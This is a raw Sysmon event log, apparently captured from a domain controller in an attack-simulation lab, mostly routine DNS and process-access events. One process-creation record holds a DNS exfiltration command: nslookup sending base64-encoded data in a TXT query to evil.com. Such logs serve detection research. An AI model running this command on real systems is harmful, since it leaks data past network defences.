14:21:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.196{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6E43-000000005F02}1372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.196{2E1864BB-18EA-629A-6C43-000000005F02}14327000C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-6E43-000000005F02}1372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.201{2E1864BB-18EA-629A-6E43-000000005F02}1372C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-6C43-000000005F02}1432C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlertf.tmp 2>&1 354300x8000000000000000208466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.720{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-50620-false127.0.0.1-53domain 354300x8000000000000000208465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50620- 354300x8000000000000000208464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.720{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-50620-false127.0.0.1-53domain 354300x8000000000000000208463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.720{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-50619-false127.0.0.1-53domain 354300x8000000000000000208462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50619- 354300x8000000000000000208461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.720{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-50619-false127.0.0.1-53domain 354300x8000000000000000208460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.719{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-50618-false127.0.0.1-53domain 354300x8000000000000000208459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.719{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50618- 354300x8000000000000000208458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.719{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-50618-false127.0.0.1-53domain 354300x8000000000000000208457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.662{00000000-0000-0000-0000-000000000000}7616<unknown process>-udpfalsefalse127.0.0.1-50617-false127.0.0.1-53domain 354300x8000000000000000208456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50617- 354300x8000000000000000208455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-50617-false127.0.0.1-53domain 354300x8000000000000000208454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{00000000-0000-0000-0000-000000000000}7616<unknown process>-udpfalsefalse127.0.0.1-50616-false127.0.0.1-53domain 354300x8000000000000000208453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50616- 354300x8000000000000000208452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-50616-false127.0.0.1-53domain 354300x8000000000000000208451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{00000000-0000-0000-0000-000000000000}7616<unknown process>-udpfalsefalse127.0.0.1-50615-false127.0.0.1-53domain 354300x8000000000000000208450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50615- 354300x8000000000000000208449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.661{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-50615-false127.0.0.1-53domain 354300x8000000000000000208448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.600{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-50614-false127.0.0.1-53domain 10341000x8000000000000000208447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.180{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-6D43-000000005F02}3832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.600{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50614- 10341000x8000000000000000208445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.180{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-6D43-000000005F02}3832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.600{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-50613-false127.0.0.1-53domain 354300x8000000000000000208443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.600{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50613- 354300x8000000000000000208442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.600{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-50613-false127.0.0.1-53domain 354300x8000000000000000208441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.599{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-50612-false127.0.0.1-53domain 354300x8000000000000000208440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.599{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50612- 354300x8000000000000000208439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.599{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-50612-false127.0.0.1-53domain 354300x8000000000000000208438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.348{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50611- 354300x8000000000000000208437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.348{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50610- 354300x8000000000000000208436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.347{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50609- 354300x8000000000000000208435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.347{00000000-0000-0000-0000-000000000000}6076<unknown process>-udptruefalse127.0.0.1-50609-false127.0.0.1-53domain 354300x8000000000000000208434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.255{00000000-0000-0000-0000-000000000000}7432<unknown process>-udpfalsefalse127.0.0.1-50608-false127.0.0.1-53domain 354300x8000000000000000208433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.255{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50608- 354300x8000000000000000208432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.255{00000000-0000-0000-0000-000000000000}7432<unknown process>-udptruefalse127.0.0.1-50608-false127.0.0.1-53domain 354300x8000000000000000208431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.255{00000000-0000-0000-0000-000000000000}7432<unknown process>-udpfalsefalse127.0.0.1-50607-false127.0.0.1-53domain 354300x8000000000000000208430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.254{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50607- 354300x8000000000000000208429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.254{00000000-0000-0000-0000-000000000000}7432<unknown process>-udptruefalse127.0.0.1-50607-false127.0.0.1-53domain 354300x8000000000000000208428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.254{00000000-0000-0000-0000-000000000000}7432<unknown process>-udpfalsefalse127.0.0.1-50606-false127.0.0.1-53domain 354300x8000000000000000208427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.254{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50606- 354300x8000000000000000208426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.254{00000000-0000-0000-0000-000000000000}7432<unknown process>-udptruefalse127.0.0.1-50606-false127.0.0.1-53domain 10341000x8000000000000000208425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.180{2E1864BB-18EA-629A-6D43-000000005F02}38325380C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-6C43-000000005F02}1432C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.134{00000000-0000-0000-0000-000000000000}2900<unknown process>-udpfalsefalse127.0.0.1-50605-false127.0.0.1-53domain 354300x8000000000000000208423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.134{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50605- 354300x8000000000000000208422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.134{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-50605-false127.0.0.1-53domain 354300x8000000000000000208421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.134{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50604- 354300x8000000000000000208420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.134{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-50604-false127.0.0.1-53domain 354300x8000000000000000208419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.133{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50603- 354300x8000000000000000208418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.133{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-50603-false127.0.0.1-53domain 354300x8000000000000000208417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-50602-false127.0.0.1-53domain 354300x8000000000000000208416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50602- 354300x8000000000000000208415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-50601-false127.0.0.1-53domain 354300x8000000000000000208414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50601- 354300x8000000000000000208413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-50601-false127.0.0.1-53domain 354300x8000000000000000208412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50600- 354300x8000000000000000208411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.069{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-50600-false127.0.0.1-53domain 354300x8000000000000000208410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50599- 354300x8000000000000000208409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50598- 354300x8000000000000000208408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50597- 354300x8000000000000000208407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.997{00000000-0000-0000-0000-000000000000}7304<unknown process>-udptruefalse127.0.0.1-50597-false127.0.0.1-53domain 354300x8000000000000000208406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.890{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62767-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62767-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.785{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50593-false127.0.0.1-53domain 354300x8000000000000000208403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.785{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50592-false127.0.0.1-53domain 354300x8000000000000000208402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.784{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50592-false127.0.0.1-53domain 354300x8000000000000000208401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.784{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50591-false127.0.0.1-53domain 354300x8000000000000000208400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.783{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50591-false127.0.0.1-53domain 10341000x8000000000000000208399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.159{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6D43-000000005F02}3832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.159{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6C43-000000005F02}1432C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 